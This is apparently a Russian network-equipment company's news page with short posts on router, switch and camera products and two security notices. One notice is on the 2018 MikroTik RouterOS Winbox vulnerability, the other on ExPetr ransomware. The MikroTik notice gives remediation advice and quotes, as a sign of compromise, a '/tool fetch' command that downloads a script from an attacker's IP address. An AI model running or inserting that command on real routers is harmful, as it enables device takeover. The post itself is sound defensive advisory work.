Уязвимость Mikrotik на RouterOS

Обнаружена уязвимость у всех продуктов Mikrotik c системой  RouterOS (информация от Mon Apr 23, 2018 1:05 pm)

Как написано в релизе на сайте Микротик - Уязвимость позволила с помощью специальных инструментов подключиться к порту Winbox и запросить файл базы данных пользовательской системы. Что позволяет узнать логин и  пароль, беспрепятственно войти в систему.

 Как узнать? Я пострадал? В настоящее время нет верного пути, чтобы увидеть, были ли вы затронуты. Если ваш порт Winbox открыт для ненадежных сетей, предположите, что вы затронуты и обновите прошивку + сменить пароль + проверьте и откорректируйте правила брандмауэр. Убедитесь, что вы изменили пароль после обновления. В журнале может появиться неудачная попытка входа в систему, а затем удачная попытка входа в систему с неизвестных IP-адресов.

 Что делать: 1) Настроить Firewall - убрать ( закрыть) порт Winbox из открытого интерфейса и из ненадежных сетей. Лучше всего, если вы разрешаете известным IP-адресам подключаться к вашему маршрутизатору и к любым службам, а не только к Winbox. Мы предлагаем что это станет обычной практикой. В качестве альтернативы, возможно, проще использовать меню «IP -> Services», чтобы указать адреса «Разрешено с». Включите локальную сеть и общедоступный IP-адрес, с которого вы будете получать доступ. 2) Измените свои пароли. 3) Возможно изменить адрес номер порта для сервиса на нестандартный.

 Что ожидать в ближайшие часы / дни: обновленные версии RouterOS будут доступны. Безопасность базы данных пользователей RouterOS будет упрочнена, и расшифровка будет невозможна таким образом.

 Характерные приметы: 

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php 

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов (обычно на 8.8.8.8).

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.

 Решение.

Оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.

 Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Обновлено 14.09.2018 19:23

Просмотров: 63

Контроль доступа -3D распознование лиц

Контроль доступа - 3D распознование лиц ACTi R21CF-30

Последним решении от фирмы ACTI - 3D распознование лиц для контроля доступа ACTi R21CF-30

Фирмой ACTI предложено новое решение для более надежного контроля доступа. Разработан пакет программ для видеонаблюдения распознания лиц с вероятностью распознания до 95% (5% отводится на повтор действия) и совместной работой с системами распознания отпечатков пальцев и картами RFID.

 По сравнению с cчитывателем отпечатков пальцев, у которого в зимний период часто появляются проблемы, данное  решение более надежно и современно. 

Приемущество решении:

  • Высокая Вероятность & Скорость - Аутентификация на 1 секунду с точности 99.999% 
  • Разрешение - 4Мп камера с ИК подсветки.  
  • Liveness детектор - не разрешает доступ когда вы показываете фото, видеоизображения и даже реалистичной маски

Решение 

Видео ролик - как создать свое лицо в базе данных ->ссылка

Обновлено 24.04.2018 11:42

Просмотров: 174

Беспроводной маршрутизатор для каналов точка-точка до 40 км.

Беспроводной радиомаршрутизатор Mikrotik  LHG 5 ac 5 ГГц 802.11ac для организации каналов точка-точка на расстоянии до 40 км.

Хорошая защита антены от ветра ( конструкция решетки). Спрятанный в блок кабель.  Производительный 4х ядерный процессор IPQ-4018 716МГц на ядро, 256 Мб оперативной памяти, а также гигабитный ethernet порт в полной мере позволяет использовать все достоинства высокоскоростного протокола 802.11ac и получать качество и скорость до 500мбс.

Технические характеристики MikroTik LHG 5 ac (RBLHGG-5acD)

  • Исполнение корпуса - всепогодное
  • Операционная система -  Mirkotik OS Level 3
  • Процессор -PQ-4018 716МГц
  • Память ОЗУ - 256Mb
  • Диапазон рабочих частот - 5150-5875 МГц
  • Усиление антенны  - 24 dBi
  • Питание через PoE  - 8-30V DC через порт Eth1 (Non 802.3af)
  • Энергопотребление  - 8BT
  • Диапазон рабочих температур - -40°C до +70°C
  • Цена - 5500р

Обновлено 24.01.2018 13:10

Просмотров: 434

Мощный коммутатор для офиса Ubiquiti UniFi Switch 8

Коммутатор Ubiquiti UniFi Switch 8 состоит из 8 гигабитных управляемых портов. Отличное решение для построения офисной мощной скоростной сети с защищенными VLAN.

Особенности

  • 8 гигабитных портов RJ45
  • 1 порт для сквозной передачи PoE (PoE Passthrough)*
  • Внутренняя пропускная способность: 8 Гбит/с
  • Cуммарная пропускная способность портов: 16 Гбит/с
  • Скорость обработки пакетов: 11.9 млн. пакетов/с
  • Максимальное энергопотребление: 12 Вт
  • Питание по PoE или через Jack

* Его выходное напряжение и мощность напрямую зависят от входной мощности. 

Программное обеспечение UniFi Controller доступен для бесплатной загрузки на сайте производителя: www.ubnt.com. Никакой платы за отдельное ПО, лицензию или услуги техподдержки!

Настройки различных функций:

  • рабочий режим для каждого порта (коммутирование, зеркалирование или агрегирование);
  • конфигурирование сети и настройка VLAN;
  • сервисы Jumbo-кадра и управления потоком;
  • сетевые параметры;
  • Storm control на каждом порту;
  • настройка протокола Spanning tree;
  • управление 802.1x и RADIUS VLAN;
  • отладочный терминал для интерфейса командной строки.

Цена ориентировочно - 6500р

Обновлено 20.09.2017 10:28

Просмотров: 554

МАСШТАБНАЯ АТАКА ПРОГРАММЫ-ВЫМОГАТЕЛЯ

В июне была крупная атака шифровальщика WannaCry, в июле уже «Лаборатория Касперского» информирует о масштабной атаке очередной новой программы-вымогателя ExPetr. Как сообщает лаборатория Касперского,  по имеющимся у нас предварительным данным, этот шифровальщик не принадлежит к уже известному семейству вымогателей Petya, хотя и имеет несколько общих с ним строк кода. В данном случае речь идет о новом семействе вредоносного ПО с существенно отличающейся от Petya функциональностью. «Лаборатория Касперского» назвала новый шифровальщик ExPetrБольше всего инцидентов было зафиксировано в России и Украине.


На данный момент эксперты «Лаборатории Касперского» предполагают, что данное вредоносное ПО использовало несколько векторов атаки. Установлено, что для распространения в корпоративных сетях применялся модифицированный эксплоит EternalBlue и эксплоит EternalRomance.
 
 
Продукты «Лаборатории Касперского» детектируют данное вредоносное ПО с вердиктом:
  • UDS:DangerousObject.Multi.Generic
  • Trojan-Ransom.Win32.ExPetr.a
  • HEUR:Trojan-Ransom.Win32.ExPetr.gen
 
Поведенческий анализатор «Мониторинг системы» (System Watcher) детектирует это вредоносное ПО с вердиктом:
  • PDM:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
 
 
 
Рекомендуем всем корпоративным пользователям установить обновления для ОС Windows. Для Windows XP и Windows 7 следует установить обновление безопасности MS17-010.

Мы также рекомендуем всем организациям убедиться, что они обладают эффективной системой резервного копирования данных. Своевременное и безопасное резервирование данных дает возможность восстановить оригинальные файлы даже если они были зашифрованы вредоносным ПО.

Обновлено 07.08.2017 12:54

Просмотров: 727

WiFi для транспортных средств

Точка доступа WiFi  для транспортных средств. универсальная беспроводная точка доступа LtAP и LtAP min

Характеристики устройства:

- miniPCIe в LtAP mini
- miniPCIe в LtAP для карт расширения, включая LTE
- встроенный модуль GPS
- WiFi точка доступа 2.4 GHz
- процессор MMIPS Mediatek CPU 880MHz
- MMCX для подключения внешних антенн  2 коннектора 

Новое , хорошее решение для транспортных такси и автобусов

Обновлено 23.05.2017 10:40

Просмотров: 767

© Инелсис 2012. Все права сохранены.

Page Rank Check

Captcha
[ Другое изображение ]
Log in to your account or Регистрация